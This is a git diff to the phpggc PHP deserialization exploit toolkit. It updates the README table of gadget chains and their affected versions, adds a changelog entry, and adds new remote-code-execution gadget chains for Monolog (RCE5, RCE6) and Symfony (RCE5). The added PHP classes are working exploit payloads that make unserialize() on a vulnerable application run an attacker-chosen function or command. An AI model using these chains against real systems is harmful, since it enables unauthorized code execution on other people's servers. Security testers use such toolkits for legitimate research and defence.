diff --git a/README.md b/README.md index 743295f..3421eb0 100644 --- a/README.md +++ b/README.md @@ -41,10 +41,12 @@ Laravel/RCE7 ? <= 8.16.1 RCE (Function call) __destruct * Magento/FW1 ? <= 1.9.4.0 File write __destruct * Magento/SQLI1 ? <= 1.9.4.0 SQL injection __destruct -Monolog/RCE1 1.18 <= 2.1.1+ RCE (Function call) __destruct -Monolog/RCE2 1.5 <= 2.1.1+ RCE (Function call) __destruct -Monolog/RCE3 1.1.0 <= 1.10.0 RCE (Function call) __destruct +Monolog/RCE1 1.4.1<=1.6.1 & 1.17.2<=2.2.0+ RCE (Function call) __destruct +Monolog/RCE2 1.4.1 <= 2.2.0+ RCE (Function call) __destruct +Monolog/RCE3 1.0.2 <= 1.10.0 RCE (Function call) __destruct Monolog/RCE4 ? <= 2.4.4+ RCE (Command) __destruct * +Monolog/RCE5 1.25 <= 2.2.0+ RCE (Function call) __destruct * +Monolog/RCE6 1.10.0 <= 2.2.0+ RCE (Function call) __destruct * Phalcon/RCE1 <= 1.2.2 RCE __wakeup * PHPCSFixer/FD1 <= 2.17.3 File delete __destruct PHPCSFixer/FD2 <= 2.17.3 File delete __destruct @@ -67,6 +69,7 @@ Symfony/RCE2 2.3.42 < 2.6 RCE (PHP code) __destruct * Symfony/RCE3 2.6 <= 2.8.32 RCE (PHP code) __destruct * Symfony/RCE4 3.4.0-34, 4.2.0-11, 4.3.0-7 RCE (Function call) __destruct * +Symfony/RCE5 5.2.* RCE (Function call) __destruct TCPDF/FD1 <= 6.3.5 File delete __destruct * ThinkPHP/RCE1 5.1.x-5.2.x RCE (Function call) __destruct * WordPress/Dompdf/RCE1 0.8.5+ & WP < 5.5.2 RCE (Function call) __destruct * diff --git a/debian/changelog b/debian/changelog index 60174cc..0a82c1a 100644 --- a/debian/changelog +++ b/debian/changelog @@ -1,3 +1,9 @@ +phpggc (0.20210506-0kali1) UNRELEASED; urgency=low + + * New upstream release. + + -- Kali Janitor Fri, 14 May 2021 15:29:16 -0000 + phpggc (0.20210218-0kali1) kali-dev; urgency=medium * Configure debian/watch to track git master diff --git a/gadgetchains/Monolog/RCE/5/chain.php b/gadgetchains/Monolog/RCE/5/chain.php new file mode 100644 index 0000000..41341a0 --- /dev/null +++ b/gadgetchains/Monolog/RCE/5/chain.php @@ -0,0 +1,19 @@ +__destruct() => close() => flushBuffer() => handleBatch($records) + + class FingersCrossedHandler { + protected $passthruLevel; + protected $buffer = array(); + protected $handler; + + public function __construct($param, $handler) + { + $this->passthruLevel = 0; + $this->buffer = ['test' => [$param, 'level' => null]]; + $this->handler = $handler; + } + + } + + class GroupHandler { + protected $processors = array(); + public function __construct($function) + { + $this->processors = ['current', $function]; + } + + } +} diff --git a/gadgetchains/Monolog/RCE/6/chain.php b/gadgetchains/Monolog/RCE/6/chain.php new file mode 100644 index 0000000..2b8baa7 --- /dev/null +++ b/gadgetchains/Monolog/RCE/6/chain.php @@ -0,0 +1,19 @@ +__destruct() => close() => flushBuffer() => handleBatch($records) + + class FingersCrossedHandler { + protected $passthruLevel; + protected $buffer = array(); + protected $handler; + + public function __construct($param, $handler) + { + $this->passthruLevel = 0; + $this->buffer = ['test' => [$param, 'level' => null]]; + $this->handler = $handler; + } + + } + + class BufferHandler + { + protected $handler; + protected $bufferSize = -1; + protected $buffer; + # ($record['level'] < $this->level) == false + protected $level = null; + protected $initialized = true; + # ($this->bufferLimit > 0 && $this->bufferSize === $this->bufferLimit) == false + protected $bufferLimit = -1; + protected $processors; + + function __construct($function) + { + $this->processors = ['current', $function]; + } + } + +} diff --git a/gadgetchains/Symfony/RCE/5/chain.php b/gadgetchains/Symfony/RCE/5/chain.php new file mode 100644 index 0000000..ace0f5f --- /dev/null +++ b/gadgetchains/Symfony/RCE/5/chain.php @@ -0,0 +1,19 @@ +createCacheItem = $createCacheItem; + $this->pool = $pool; + $this->namespace = ''; + } + } + + + class NullAdapter + { + private $createCacheItem; + + public function __construct($createCacheItem) + { + $this->createCacheItem = $createCacheItem; + } + } +} + +namespace Symfony\Component\Console\Helper +{ + class Dumper + { + private $handler; + + public function __construct($handler) + { + $this->handler = $handler; + } + } +} + + +namespace Symfony\Component\Cache\Traits +{ + class RedisProxy + { + private $redis; + private $initializer; + + public function __construct($initializer, $redis) + { + $this->initializer = $initializer; + $this->redis = $redis; + } + } +} + +namespace Symfony\Component\Form +{ + + class FormErrorIterator + { + public $form; + private $errors; + + function __construct($errors, $form) + { + $this->errors = $errors; + $this->form = $form; + } + } +} + + +namespace Symfony\Component\HttpKernel\DataCollector +{ + class DumpDataCollector + { + protected $data; + private $stopwatch; + private $fileLinkFormat; + private $dataCount = 0; + private $isCollected = false; + private $clonesCount = 0; + private $clonesIndex = 0; + + public function __construct($function, $command) + { + $this->data = [ + [ + "data" => "1", + "name" => new \Symfony\Component\Form\FormErrorIterator([ + new \Symfony\Component\Form\FormErrorIterator( + [], + new \Symfony\Component\Cache\Traits\RedisProxy( + new \Symfony\Component\Console\Helper\Dumper([ + new \Symfony\Component\Cache\Adapter\ProxyAdapter( + 'dd', // exit function + new \Symfony\Component\Cache\Adapter\NullAdapter($function) + ), + "getItem" + ]), + $command + ) + )], + null + ), + "file" => "3", + "line" => "4" + ], + null, + null + ]; + } + } +}